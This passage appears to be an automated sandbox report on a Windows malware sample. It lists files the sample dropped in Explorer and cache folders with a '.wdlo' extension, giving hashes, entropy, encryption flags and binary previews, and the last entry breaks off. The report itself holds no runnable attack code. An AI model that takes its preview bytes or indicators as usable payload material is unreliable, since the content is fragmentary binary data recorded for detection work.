                  Preview:.... ...y.3.....:~....8n.....6.3...1K.....=6....U...q.O.h.+8.a&....F.^......**]y-w......C:...........&....x..Gf...Z.&'#.93....s.7..p.. ag>n.=.q...5...P.5y...b5%m..S.Q.3f;......[....T....."xe...*@u.....N.pR.7.oi_s..:....[.S/..IB...s/..\....[.@Yc."..J......+tXd...c.;f._.Ov..#..wS.=.`e%.g.,N.[...t.....C...AN'..\)=.0.v..*....*.Qx8...z'.g}./.|...7s.N...1$.3...`.Ndc.y....._..j....scxf?5....l...k..las.?...C.....I1.@..L.Y.tFb\I04.n..s..T8..`...X...=.d....b....`*.....T.;W.|.n.N....Q..I....g...+X.R.@u.7,..........1.y@.c1..m.,oO.\_u....:.`..:....u*.......f.Y-\..i6B/.b'.z.*-G.D..Y.. ..d...Pc...l\H..{~.\hM.?M.fR.c...p............c...L.w......Lw./\.5.]..^..}.wW:...N.W@9Y.6*=.b...k.sl.]...k;..`Y.`c.H.O.\......B!v..kf.....#...9.+I.c....o..Qv&..O.a.*..}.O..m......<.f..T|..?.-..;.w..LO.,.]B8...p. K..QQ.r|.OAm.........N....;...F....[.z....MLkB..x>.....a.nF..."..X.G.dT.........".1.....-..H.X......]mr...E.6.....}4...:.:..N.;8..s........Q1..Cd2.C`.}.s.d.T..:

                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.3.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.98847691711469
                  Encrypted:false
                  SSDEEP:384:ySR1JXHLOMM4jo7mKsCPnLp80ox2I2yryPPcDiHc49s++QwXUEEQ7lh:dZOMML7WCPLpJoMh3cDiHcYsnQwkpQ7D
                  MD5:C66173470E4E683CEB90B9295E22862A
                  SHA1:3CBD56CE2724B13499CFFA5BF875EF30DA3F6BDC
                  SHA-256:F4138BCC16D1213F6C6BE2BB998CA6BEDE2BA75C2D0BB2DC700681C4C90EA20C
                  SHA-512:7A5EA97275A52DA3BECC6462FDDB1BDA488501E24DF1515D7F60B731942C19F38A03C098533E93298430D95EB183E2E43AA19347B8196C6BAA488FA181BC5E73
                  Malicious:false
                  Preview:....`^$...c._...D[Kd.M..O?.$../{.#E.'~#WN..i.........a.."JS.B. ...3H.).)...M..=.x.".&.^H..$....).........g%...kb.U.......x.{.;...x.XM.d.3..D....3.....!...U8:jf... .f...p[!2` F=.].V...'`*.Xp..kTS....HQ.M...80.p.T.is..w............e...s....8u5.t.D..Z~7._..{F..=.)?.E.M3....9r.p....r.h./.......N...~r.9.D....R..^...}..."[.p^M..@.8.m...).S.,v.KV1..8...%.~|..a.q.*.cAO.3'.$........T$!.....7.g.....m*B....".#D./eXO..~.{...I.... .].lL/o.....\;L.?.x..}..u..t.m.x....QGr.v+.m-..3`.....m.J2.AE7..xlz8^.WA...y.?.A.k.W..Gg.-...-..T.?Fj"..2..1.:...CN...].....$?..`...^...R....?V..d....#.R.}.N[.'...J...>.......q(....@..?.Y.Y4....H:(@.i.!...Bs-..nw.]2.+e.{...a..9..ug.KUe.....).Q.0e......3.~..V..7...!.0RN.. ..W.0..(_dI....+.@x.zb].EX4cf... .Q{!..t.b...*..ng...c}.&o'..G..+9..m!j".lD.@.....=.*.8d.......'..]....g'#.....v,.......6d..T....8.n...rjP.K7Q.P..'3t.R..T..-....Z.......9 ..f...m.t(...J.:.. :S?...Q....k.S..&.....;..j..8..E...JX...5/.....m,...b~..C.q...V..77

                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\{0325ABFA-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):424190
                  Entropy (8bit):6.332406522532871
                  Encrypted:false
                  SSDEEP:6144:fpsabcn+jCmGsOtkqjegumQeOFEZ2n4m+vyJfbnQkK96B88yKv4bWTmTvEiLS6:fpRcn+6sO7qgumQejZ24m+6dF4/Z
                  MD5:6E73BEB67B04CD984225E1C577D70066
                  SHA1:598D330832FBA4E2AC9A4ABEE61CDFC8025ECDCB
                  SHA-256:F45AD2DEEE6A485B7A544775722421A8D41FFFEC4BCC18C0E588E7912C88D1D3
                  SHA-512:1D1E61729B0FAD5F3BDC6D53862D7298DEC19EB6A76FA16ED80053C00868BCD20A333EAC1FFA8F7E1E19D05B36974F1066414FCB32D3CD67F99E38D827E12917
                  Malicious:false
                  Preview:.w.. y...9.k.?..iH...J..'ky.L.....~..\.kMbs%'.:.t.)..s....9...(.....cp.j..i6....r{..u.F....2..n.d.h..`......<._.....~..Q.....g.*... ..RUl..{...a..R,.y..,@.&.m5.zD`.E.....6.l|N........?...P.i..lK.qh-.....]..L.j_..V[qnG..........<..N..M.>...8v.w..2....V....}.......x}.<..R..{.0.}F.......2.....:....A.5(.1.M.8Qm_..w.6{|szx..W..;.s...oO.....G.X..uq..2.D.[....<>:..e/..[..0N.....N..k..VK.i..d*w.79.:.S.....G.L.`YQQ.z"j....r{...i=Fsx..;.......$y.[D.q...(.......Q)..(..Mh.[....:.;t.......X...b...:g.i..Ny..>....GM...vx..b..7..o.k;...-.......@ .9-U......(&....h;[.#.j..![...t..p\...h...mk....Y...l.@IY.<...P?.R'....I.......9t.\.....um1>(......q.I.@.mg....B..<......?.6.O..-ps.3.....&o..-.j...O.h..Lu.UZ..3.m..h.|PUuz.y......+._R.>8@H.?vCK...J..9g..z.8.=/.'....>}:...K.f..L2.../..t>L..H.....'..{#y..}....<o`>......tN..(....?.].{.....vS"..*.l.ar..a.)..o|.{.....JO7).k..^y...|..J......I....~....+..<.H..s.....:.g.........v.2..T.l.....1MS.S1..#H./>iKL%.Ic...

                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):102918
                  Entropy (8bit):7.998507254824974
                  Encrypted:true
                  SSDEEP:3072:kkrJBiqHlrFpitUMFL21JAI4cNBl2CIY9x/:lziqHLpmFpIBp9F
                  MD5:790FEF02BE4FA0FA8EBA65488AF537BB
                  SHA1:3FDF3DA2CD39F394B6A06581D3EBFBDED6434E95
                  SHA-256:7D8FF417DB30747F34D7E344C7350E9004ADFD7401F1FD14DE5FF1246FA683CF
                  SHA-512:F85FFAA3E2CD9C6A2BCEACDEFCCA29B893E0359F97C7A776787DAF108DC7DF35416F6490840428618E35028ECB149839CE130C4D71D3F3497C7067FE0C4DC9F8
                  Malicious:true
                  Preview:....h......L./{..k..0..9LN.v.k..!....Y......*|E~..Z.t...........}0....<..X...t..(....U2.....I.[=p[...].E..8...."..U.rC....;.zK.;`=.......A..aP...h....NG&8l.W..D....7...:D>.|..:..^$V,2.^..U.l^......:..HB.0$....t.F..~......(...@....&~D..b....gwQ......s.F.......s....W...1f...K...t.1..o.Uo...$.0......O~M...C...=......K..N...4|M,....$...>S.....R.......'.........(.].......F...=2..f!t%F..z....y..-...?...../.~...,j..@.Q.{.E.CH6e....h.!A..B.........K..S8...2.j....y.Z..../wD.Cd.v..PQ............/.b..+.l.Vz.Gec(..>f...%...E.3.J..7/..J.6..0...&....d.:?..b..')A.X....(q5.Z.%.J...@..-TJ>.!.u+Z..i.......}}D.@.....w[.TF.g.m...TN....dm..e......g...:.@...;...u.fL.r[.w...."...j.KE[.ZV.........J.)!..`.....T.@.v0...u..$I.Kt6..$..Sd..G.}......H.]D..r..`k.g..E....'...Jb'.g.!o.\..=d...C.)....'..G.......\!.....s.j....j@...I.t..$"L...E..'........|.8.j.!..-...Y.C.t..L...H..9.^...<..~.c.e C..m...Sp...K.'..Fmc...8.....k..1c....A..B/ic......Rqg..A....O..G.

                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75502
                  Entropy (8bit):7.997678560513898
                  Encrypted:true
                  SSDEEP:1536:ghMxmMFinKMfQz+CfqbVtCqJX8mm5DoG/8D7ZQMK8VGMLwjyn90T8:H+nKQQzXfqbjHm5fE08TFn+Y
                  MD5:5C73627ED9B96A854461B1EA66C3F70F
                  SHA1:A1251A1E44B84914F81D2D7BCCF673C7A771B61C
                  SHA-256:1BEE2018C173AEBE635C78B286580344F85998F1B5A9BADDC4A0256EC66B4421
                  SHA-512:25B37DAAE6E41860F107E9FFF420857F4757E30098342B74533AF017122E56D6AB7D1533E6E7887D39C9175A5D33F93509CD5623121B8D18802FC1229ABF2321
                  Malicious:true
                  Preview:.....c...#0../..t....i.t..6.q$.8....T.T.t.^..J.eAk-.........R....B3..O.#h..{f...TB.23.u.l....n.VZ...7...%eE....I...&.6.^....*.U7vZ..,....4..3,..z.S..$.!..n|....HK.o~..%......0.|.>...~..L..r%.9.c.~s}-..0?..e.q6$I..*.z..\.^_.-M...?2{e}$...V..!...8..AcD.:9...a.KH.g...Noa. .f!a.Q.;...O.A.......@...A...+.$.......EQ.:..8.|...fnY..D..#2.!.2..E......bN.=.td}.....{.6._.1Q2.R.[....G.......jJ.*pK..,.7.H.N...9h>..6.".T.......FJ....}j:.0..O..Q........zD..Z.........\.fV..h.k_4..SQ..xJ..b...A.1>.........H....i5...N{.g...{..Ty.....I.-Z..nI..M.<C.f.?..a36>M....a...~.Q.'.wOz...VV...2F.O..h...#@.G.@.E(.u.BP..=..#.T......T.t........4.[..,.1...[.xF...j.c...IP......C.73"...\...(wV.E7..o..0&...g.7c=#E_....p..I...\...t.....6......K./.mCr.a.n......G.`......RUg.....J.+..w.4tpA4. 4.#O....?..S9lk:.9.;A.!O....7...;......Wl..n....:;.....+.p.w-..Bat).....T......d.K.v.F..F..?.o.4=uJbX.#7....i..kl.XsD..3..V.....8...........A..o'...gT....G5N.e..#.!.q..Y.X%..?...}I......&.g

                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):105422
                  Entropy (8bit):7.9984888404006
                  Encrypted:true
                  SSDEEP:3072:OdEadVy45BhEGpyRPfapjVxfCm+8VoSBdm:KE4Vyr3PixKmkSBdm
                  MD5:8F54FC008AE4D9D7B8E3BC81B0145B89
                  SHA1:B36C03BF8CCB88E654DB606DE96417A3BA20D739
                  SHA-256:31D06126339ED26A43890FED29604DAA856E54644BD97C49469CE9B235D63044
                  SHA-512:05575C9195136FE4E56B32451D2FA67127A85A15E5657D2C9B7388F63C48009AB2D4981CFA69207D0B48DDF4C6F2A71E41DA3B54DA2473BEC8B9C52E3F81E956
                  Malicious:true
                  Preview:.... ...-..I`....I......&.W.....D^E.=..!5...f..F.S+.u.#.p.nG.].....*...5@.4....3.}.?.>.......O|.Q.8["...N.&W<..Z.....|.T..M ......]G#3.3.,?;.e...,....p.(./.^%.......Eym'.....L[c..&..@......x.a.W...')"SgV".7Q!=.l...<n...{.b.z.;.{`p.AQ.lL...M.o.D...>.F.J6h..J.]..sS......s}u...s|.r..)Q8....-........|Y...}..A.........~.....?..)..#...D,..fY.{.._.V...[r.T..6.r[.+.r..u....and....J...^YyI8.q.....;fn.IQe.l>.q..k......R...C....N..E.a.?^h...E..G/..1...m...1..h..?...!.{......._2Z..?.j.....P.;Ei........>..)...7).V8@..WA.....d..OA.>q..*..**D.@.kc..$,4.a.o[.....|q...K......P#.@(.<A.T..V..w.u.6.qv..U`<...?-..r.4...3t...W.l.....G*g...X.....{.....Pw...%P..."..?p.....LJ.^.>.!......g8.....O...U.S'..... >,....!F~...^B8..0.....y..-...6WJ....'.>K(..~..X.Bh...o.../..[..D(B.i.&O2..F\..Z......l.!....8rR?A#.G.....O\)..A....bn...1.5s.Y........V..z....T...&..Ia......7....k....\.J.X..;`..V..%...a.R.u.k...G.N.X..^.....f....].C..G......^1.t.Z.#.........x.#.O...:..9....

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog.etl.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):639310
                  Entropy (8bit):5.731658733571238
                  Encrypted:false
                  SSDEEP:6144:1Xvvizssahqw9ckuq3UBXTy6/76KsZW/h3E+NJ:FvvIshjIqkBXTyG7pJ3EgJ
                  MD5:B66111BD2638BEE4BA16DFC9BEC0580A
                  SHA1:44F4829EFE1EB7772395A8E0E52CC3F39EA32F5F
                  SHA-256:0B7717537AB3ADFAA05DA7320C3F294AA7FCD7A0A05BC0BB2EED580D567EC8C0
                  SHA-512:EB7CB82FF2043EC9863473E44A294B07C52D7AD60F51D7EB3FBFC6B2221C569964E3D194BBB9FC7105FA9E0144E92040F22A92A66084E68E14EA96F4961D35BF
                  Malicious:false
                  Preview:. .........'.......L.*\...............9.3..(..Hr......G..'..5...GP.h.x.....C......\..y..).lGl..C;f.[&..1)j~..B.V`.-W.I.;..&....g..G.......HO...(d..&.w.qdC.......Uc.........\K3li.?.,.K*...ndd..G2...^...Eq..e...x'... .......k.I#.}..,..;...<..F.......S..F......q...Z..).K...?.P.;.FG..|G..@=.<.+......z6..{#..z.*:.U.Lm..P`X......)q..3....K.y.J..&`!p....d..@...0f._C.. ..l..=...+-.........aRB.....W.b.T.\W..LGP.BH.9D13..).w!..'.MP....=z.....7..EF.....+..~........ #MV6...%.q.yz\.-i!a...zt.<c........Y.J.9V.T.t.....V..)1...u./'|.?j..Ave2f...SE.^...%.E~.>.v..V..n0..f.>.1...E.C.%.P.......+0_v,i.U......bm....>.....t[..._..B//.h.!.....E.....>.T&...[|p"....[..o...M,..W.'............>...y.....<mp..7..I.....P.H?V.<.....<s.$.n.6M.y5f...B{...VK.?....>[.`.&.n'.z..t..J...f.n)....d.n.6a.e......`........h....eJs.|;._.t....w.........9u..0.......3.F....#.<...c"..-.....i..O<....'....n.."...B.......M.....~K.....y\@..mM.C9.z..|.._.[x..N.<....a..#....i.c.....k....F

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992951917588445
                  Encrypted:true
                  SSDEEP:384:SqL4uRTLmxplUF4qta38IWgHQU5dPk43/z3CB8jwO0yArAXOxjehY85Y:jLxRnmUq0k8Y9Hz/OBxO4r78a
                  MD5:30B4C4296EBE8149974E0CA9E7D088B6
                  SHA1:93CFA06B7389066A2701769AA7677C19E8CEF174
                  SHA-256:FDA436CDA2F896522195341567FBA8BCEA9C28F7ED4251BCB64C2D2C134EFF03
                  SHA-512:3511313E67912AA12441D1471A1820969028BB5B1BEF466B6776FA2AC4857B9FCB5DB017EAA89C33CBDC202A1EA976C11D7FB78703CAC3C9E60DAAB58B5B7C39
                  Malicious:true
                  Preview:. ...7...;....gH.3.2..a.G/.0....r..B.B+..e....X@.:..8...}.p=.oZ..'9!NE..t.D.....ek...?O..............4.*aXy. ..D..L{E|....w.pT.o1-.!;.S].W#.*.0,m......X..>.ki.C.jD...*.`zP...l...U...&..M6..\-).w@..Pye.I..!~...G..73.?.n.u.SD.x.W.I.G..2]....RM..!..,[....(.i....=.2F.\`....U.n....].......NI....'.JXF.Z...J)K..q.m........68.6..7.3...;@.}3X.+>"....*....9S.....m....Q.:...a../.].u.~.T..=|h....C....0........FT.S....@..[../ ..9...,..P..^...4]..L[n.x.+..........g...........`l...]w.~=9...J.]..m.......Z;..9Q..<v..l..XK.i<A.....Nw{!.!sK#).}I.Nh......E.95.c........B.`Q.7...R...4...{6.Qh...:.......].A..R^b...`L..V...H.{..8.1.....t.t...{.H...$&'.t ...92.?yh.e.&~.......UaM..C.yF.^.B.|.......z.X.>.r.....,.+..3..2.]....eN....m.o......~?.....H.V..~.SQc>..d?...........d....(t..4._...e...O.9~..=V&....Q..4.uu./.H.Z.f...7...u.l......I..>U...i.._..O. .....K.....'... {..k.U....u..+..,......H..M....R(V.....T../1m<T.. ..h..b.I.<.....D_C.r..C..))%K...*.d......11.

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1280.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.413115359801028
                  Encrypted:false
                  SSDEEP:6:j2CH8HCym+fV8bfOBCtKs6VyRq1ranzjiflYhCfaKNQm5e2UBBOsVolWbz6Wciik:j2CvAt8bfuEKnVTZaPjhqanm5pY36Wcq
                  MD5:5B9F147087B4E273BC3DFBE7EE152DA8
                  SHA1:24C19B0AAD363100C9376A1A323B9455E7CDB857
                  SHA-256:463CFEE213B5A90EFA334619A4490DF375537DD72B89E412E6C9F1CED2622CD9
                  SHA-512:DC39129C8022948D159CAC35617D0C451A6D6098F642E8F97A0B56571A62C78169828215169DEE2512196E0C8A2E57044DFA28C3E23429BC2E814C95A31FA8A4
                  Malicious:false
                  Preview:CMMM #.X../.]..Zy...{z!...&...V..||.I.p....=&v...'..5. ..........1.~.Ik]...co..\+......6....@S_.:...d..O....P..%J..?...L..]...Qo.&..w..^.6.T..n.!VYcv.Pw.:>7a...T.p|....^...Z..e...e[....W..np......0.8n....=.).....0..@.d....}..l\.....U.d.{.'G...S^....5.\..'Sk@g...%..Si0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1920.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.290795667226111
                  Encrypted:false
                  SSDEEP:6:BwbxUpArGe0eF5nAafLmN1yIUfMfG1540JliUFvgYIbVZdNBBOsVolWbz6Wcii9a:0xUpAtrjA7KfGy57lBFvmN936Wcii9a
                  MD5:D531781713C06A4FCF909AB63E9F3D11
                  SHA1:3F531CD3DB182C78F218BD5037813C641CC8F132
                  SHA-256:DBCEB7397C4BB251AE016E83AEAAA1A61B6160679FC38120434348DA3FFDF16C
                  SHA-512:C641FE52E0F45534A5A71F50F029EBF33AD785859FCDD434A54EE75FEB415109A7DBD61F294BBAC51654101058291866DE72B60831BE35A643CA809CD569FD54
                  Malicious:false
                  Preview:CMMM .......,..9/~4.>|.3.'f7~n.....]...#..Q.D.m.@..M.Fw..n.oZj..S......{.....S...W.*._.."}..5D...;..#...).1.E.....br.I.Y.dVV.....6.._..... ..k.F..:.{.T}.-q..{5...{d.K.G.7.)J.....CWv.m....x....k=.\.?.?..`...'..,..u.(..&dK2_?.^S.nH!.l/.p.C$.-|A...N-a.,>z.....^.....j..3..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_2560.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.298139774720778
                  Encrypted:false
                  SSDEEP:6:0+qp8gu8odIXMYqmheHYMnujrPuE3Qn4Q8xAH8i4WonfyOQfbOsVolWbz6Wcii9a:0ggu8KIcO4HYMsrH44Q8xAHzBofyO09T
                  MD5:215892B6691393F5B6DE4C3705F7E96E
                  SHA1:CA04CE81B401F527365C6C255EDF792732217EC0
                  SHA-256:543D0F9C8EA27EA57093669437A96E36BEA9EED27EF537FF4908A259115511D2
                  SHA-512:63026156E3137E0BD5E263FF99D4B466B2BE3A643C17D0BA3E41A45ECAC40764FC7B4FDEAEBE87E9DA06F7444248E98A40532B9D4FE1445080E1BF95555142F0
                  Malicious:false
                  Preview:CMMM .#j.W.0_)..4O;.E.j.~-.sZBt.)...~M....9...$...!..W.z.&.i........g.D.<.q. ...@#.\...vzD&..r|....M.....15s'..B.K..3?A#..7<...s..i.....j\...C..`..aI..e......!....F...[.c...?.]..em.Q.|.....u..N.].]...4.oP.W...*...+6...'O..o.Z..]....`........%......dER....=}".w2...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_768.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.290003533205646
                  Encrypted:false
                  SSDEEP:6:oLByVSkJhrLvCCZ/GJTKqLTPq7n5WN5nmTr/1rLjzs+kOsVolWbz6Wcii96Z:XSihrDhoTbT65WNJcZr4l36Wcii9a
                  MD5:A536D789B7DFBDE714C29A42BD7CE132
                  SHA1:217F475643E10CC00A03B79F0A291031D8519ED8
                  SHA-256:101B949012D918B8D578E95F430371D25379EB862E37C079469A6BFBA13FA370
                  SHA-512:2EA21ABA1411C5B16FA6DF7F5AC906054D3400D7FA49D9A8F837C25FD137C583948F3CBD806AC44CC6A2B14A29B793CFCD4F46840F366027772A3FBE367FC3FA
                  Malicious:false
                  Preview:CMMM ..g.C=.M..16..H....K/.s...Eik.;|..V.....[..Q..3q.y.l.*...O...!...f.y......b9.v..7.1....|Z.=..e.6...w.%P.....(.\;d.@~nM..")2Vi....O.".&..A\6.C....Yg.j@..s.f..;n^$p.;4..9...U.z\...I. F....S.FR.K.?......z.....+..%;.X.*...LY.f..'"V$...^...0..a.q3g.L.....\.a?.2./...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_96.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.322421059353604
                  Encrypted:false
                  SSDEEP:6:0Xja7NMQKT1hs24xhDeljWsdxf1lByxJXN8HXSjjnnMMOsVolWbz6Wcii96Z:uj95T4242ljWsjBkdyS3736Wcii9a
                  MD5:082BA707D961923E83DD0A09BEC623F1
                  SHA1:3FB31AC99271E9FD43E6A12FEB934C6A1700D895
                  SHA-256:8F892B5D3A96461FF96C204E744897BA3352DF8A0496699583D91DC13C2EB7A8
                  SHA-512:A5FD4AE1BAEA41C315EA6CB93B47B7236C883FA1C05071EE88DAEF049696CD2BE43E4FC720F043007C4F979591073288C5A8C0A5F0C379C5D9F4F14FC33F8D8A
                  Malicious:false
                  Preview:CMMM .....q..r....V.=b...KY......ZF..&.H~/&...nu.._.O....M\F{....].c[.|..m<..i.<7...RC..._..]Nu....f9.Q......^0.~........R..'=..9J_9&..0~.......X.p.......L .Y.l.$.C.`a.er.l..]..>....G...4.3.,..G...Z;Y.E........^+..IY.?V../w..h.. ...cX......D....e....M%.f......2..)%i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_custom_stream.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.309034005251196
                  Encrypted:false
                  SSDEEP:6:3hHkcPvmvC53xXfBbiIlvld7ZqE6xWN3WJJYIC9HCNJMpg2PPPAOsVolWbz6WciD:3hEUmvG9BbiIdtGxPU9HC062I36Wciik
                  MD5:59AEF6583E87270487B7DD71B6DD79F5
                  SHA1:52C712728F7823834B81113ED4249042BB93A1CF
                  SHA-256:B3967AA8123A90311044A81C39ED15DCBC4BF6F4BF0BFE826D32EF59265AA8A0
                  SHA-512:C8034C0B1F65CA7275C5CAF2A59629C51DDDCAB484608826690B840342E0F20CA727873D77C0B6F2F856A93C39C2806A45304EF7F7E94F5C0DF962949D141C41
                  Malicious:false
                  Preview:CMMM ..f..l]BM.u.Q.d.n...)g.X.G....3....M..\.O@..1..9...".O-...2K./..3..kR..h.&H7:,;.z.%..n...X.y..a) ..t...G'[.._G.kh.V.[......1.......8>A@..6........1&IY...._..L2c.*.....^.(.;".......I.S...f..C^.j$Oz.22...a/t..E...G}5>..#.e-N..?......b..r>.%...+..K.....^...2.~YC.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_exif.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.284857966055517
                  Encrypted:false
                  SSDEEP:6:jdJdH+al2GfCHoLFOlcPPDvIG1LGcjr7cwGxsapZgk3TwFu3v4OsVolWbz6Wciik:jdJ1R2GfCTcPzIG1LGCr7LLapZgk39gT
                  MD5:6DB78AB849B0C490D5D4291B1FACED5F
                  SHA1:AB34378014AB21D14C62584DB5638A95D4BB2C8F
                  SHA-256:1CF0514EA9999A5A95A519986DF10E90F0B50B7BD984CFCD84DE82D426DB9282
                  SHA-512:7DDFFC407A1AEDD2170C1311DAD211AD206E3CA5CF35E601C191CA9038321582ED6F5AADE327108E8FEEFAA381AC7DE276908C5C335F31CC7D54801C858AA301
                  Malicious:false
                  Preview:CMMM .....X@./.:"]#..1lt<.].....=.u@W.nU=...e..;.b..u]........x....@.dc.....c..--c\J..i.5k.T....t;M2\..(zA...i.w..."..Q;.}....n....X...m-Jc*.c....Y?#..`).Se.:..e.....Tv..b.,...U`.\;.#..o.B.[......'R..A..W....1.``.....#.%m#.d..=...-%.^.'l....4.....yw.U2r.A..55...p..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_sr.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.315763840442256
                  Encrypted:false
                  SSDEEP:6:uzZGjhoHVHgTqUZSX0KAQoGpNbMAottiUpqHWobZhmZOsVolWbz6Wcii96Z:05HVAOrcqNbB0MoaWobTO36Wcii9a
                  MD5:5A989147A43BB618499AF94240910D9A
                  SHA1:F428A98E0C0513EA7FD5C1E41915C0B3923F6292
                  SHA-256:AC11A7C696D97050725DC7E3B859EB3244D1BD3811F62A6B61979F030AC4BAC1
                  SHA-512:83635368E4E5E46EBC62AAEF8F8ADE36471C3436984E9104AFD30048FCAE32075194A4927B99C5896CF358A7EABA855161B3B55852BB8A963743C632CB6AA8E6
                  Malicious:false
                  Preview:CMMM /g}...._G..$.i.....].$.....L...i=.../.}..Q7..>....IVB..c.....iT(..........$MO.i.?xG....\.....o...f.m-..-F. "&...4!..........v...u.F..R.e2........3....;.....bUM}a..Y..!R...r.....\I&O..j...]....7cgX.`..^3.\<.|L..@<<.=c.....b.s.s.>.......4.......h.'.C.l....C...7.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.358411982914231
                  Encrypted:false
                  SSDEEP:6:8KBpyurau+G7o9o0+Llh11b4Qp/SOmkfFZrS2nx7V7ROsVolWbz6Wcii96Z:8KrLl+soELd10QpfdZx7VD36Wcii9a
                  MD5:6BF0CF124D17240E729A8CF29FAB26C8
                  SHA1:681080EF2F982DD00B71E5540A0D2BB3B4BC8E14
                  SHA-256:EEC556C0B8636476758F9F410FAEAABC9FCA646F9B43F38586FAA92775CB6772
